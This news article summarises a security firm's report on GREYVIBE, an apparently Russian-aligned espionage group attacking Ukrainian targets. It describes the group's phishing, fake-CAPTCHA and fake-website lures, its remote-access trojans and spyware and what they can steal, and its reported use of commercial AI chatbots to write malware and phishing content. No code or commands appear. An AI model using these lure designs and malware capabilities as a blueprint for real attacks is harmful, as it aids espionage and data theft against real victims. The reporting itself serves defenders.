A previously unknown threat actor known as GREYVIBE has been linked to a series of ongoing cyberattacks targeting Ukraine and organizations connected to the country since at least August 2025, according to a new report from cybersecurity firm WithSecure.
Researchers believe GREYVIBE is a Russian-speaking cyber espionage group operating within the Russian time zone. The group’s activities align closely with Kremlin interests, particularly intelligence-gathering operations related to the ongoing Russia-Ukraine conflict.
Multiple Attack Vectors Used to Deliver Malware
According to WithSecure, GREYVIBE has employed a wide range of attack techniques, including spear-phishing emails, fake CAPTCHA verification pages, and fraudulent websites posing as Ukrainian adult clubs. These campaigns have been used to distribute custom-built malware and gain access to targeted systems.
The victim pool includes military personnel, government agencies, civilian organizations, and private-sector businesses, indicating a broad intelligence collection effort.
While the group’s objectives appear state-aligned, researchers also found evidence suggesting links to the Russian cybercriminal ecosystem. Some members are believed to be current or former cybercriminal operators, blurring the line between financially motivated cybercrime and state-sponsored espionage.
AI and Large Language Models Play a Key Role
One of the most notable aspects of GREYVIBE’s operations is its apparent use of generative artificial intelligence (GenAI) and large language models (LLMs).
WithSecure describes the group as a low-to-moderately sophisticated actor that relies heavily on AI-assisted development. Researchers believe AI tools were used to generate malware components, create phishing content, build backend infrastructure, and develop obfuscation techniques.
The use of AI provides several advantages:
- Faster malware development cycles
- Reduced dependence on existing malware frameworks
- Ability to rapidly modify tools and infrastructure
- Improved evasion of traditional attribution methods
However, the reliance on AI has also introduced coding and operational flaws that exposed portions of the group’s infrastructure and malware functionality.
GREYVIBE’s Major Attack Campaigns
Researchers identified several distinct attack chains associated with the threat actor.
PhantomMail
This campaign uses spear-phishing emails containing links to malicious ZIP or RAR archives hosted on cloud storage services. The archives contain JavaScript loaders that launch decoy documents while secretly deploying PhantomRelay, a PowerShell-based remote access trojan (RAT).
PhantomRelay is capable of profiling infected systems, executing PowerShell scripts, and running Windows commands remotely.
PhantomClick
In this campaign, victims are redirected to fake CAPTCHA pages designed to imitate legitimate services such as Zoom and LAPAS. The pages trick users into executing malicious commands, ultimately leading to PhantomRelay infections.
PrincessClub
GREYVIBE also operated fake Ukrainian adult-club websites to lure victims.
These sites delivered:
- FallSpy, an Android spyware capable of stealing sensitive mobile data
- PhantomRelayV1, a modified version of PhantomRelay
- LegionRelay, a lightweight PowerShell RAT
Later versions of the websites included WebRTC-based live video and audio call functionality designed to capture victims’ conversations and recordings.
LegionRelay supports:
- File enumeration and exfiltration
- Screenshot capture
- Browser credential theft
- Telegram and WhatsApp data theft
- Remote Desktop Protocol (RDP) access setup
DroneLink
This operation involved fake charitable organizations claiming to support Ukraine’s Armed Forces. Victims were tricked into downloading malicious software, including WireGuard-based payloads and LegionRelay.
Nebo
Researchers also discovered a FallSpy sample disguised as a Russian-language login screen. The malware was likely intended to deceive Ukrainian military personnel into believing they were accessing a legitimate Russian military terminal.
Evidence of Extensive AI-Assisted Development
The diversity of malware families, delivery mechanisms, and infrastructure suggests extensive use of AI platforms.
Researchers identified traces indicating the group may have leveraged tools such as:
- OpenAI ChatGPT
- Google Gemini
- Ideogram AI
These platforms appear to have been used for image generation, malware development, script obfuscation, command creation, and infrastructure management.
Security experts warn that widespread AI adoption by threat actors could make attribution significantly more difficult in the future. As attackers continuously generate and modify code with AI assistance, traditional detection methods that rely on identifying recurring technical artifacts may become less effective.
Connections to the Russian Cybercrime Ecosystem
Several indicators suggest GREYVIBE maintains ties to broader cybercriminal networks.
Researchers highlighted:
- Access to an ISO-building tool linked to the TrickBot ecosystem and UAC-0098
- Reuse of PhantomRelay variants across unrelated cybercrime campaigns
- Uploads of development and testing samples to VirusTotal
- Informal developer naming conventions such as “letsrollboyos,” “totallyunsus,” and “cuteuwu”
- Deployment of XMRig cryptocurrency mining software on some compromised systems
These findings led WithSecure to conclude with moderate confidence that GREYVIBE has connections to the Russian cybercrime landscape and may include former or active cybercriminal operators.
Attribution Remains Unclear
Despite the group’s apparent alignment with Russian strategic interests, researchers caution that its exact relationship with the Russian government remains uncertain.
GREYVIBE may represent:
- A state-sponsored cyber espionage unit
- Independent cybercriminals working under government direction
- A hybrid organization combining criminal and state-affiliated operators
This overlap between cybercrime and nation-state activity creates significant challenges for attribution and highlights the increasingly blurred boundaries within modern cyber operations.
Final Thoughts
GREYVIBE represents a growing trend in cyber warfare where state-aligned actors combine traditional espionage tactics with cybercriminal techniques and AI-assisted development. While the group’s operational security mistakes suggest it lacks the sophistication of elite nation-state actors, its evolving toolkit and diverse attack methods make it a noteworthy threat to Ukrainian organizations and their international partners.
As artificial intelligence becomes more deeply integrated into offensive cyber operations, security teams may face increasing challenges in detecting, tracking, and attributing future threat actors like GREYVIBE.
The use of AI to generate malware by GREYVIBE really highlights how state-level cyber threats are evolving. Combining sophisticated AI with traditional attack methods makes these campaigns more adaptive and harder to detect, raising the stakes for cybersecurity defenders.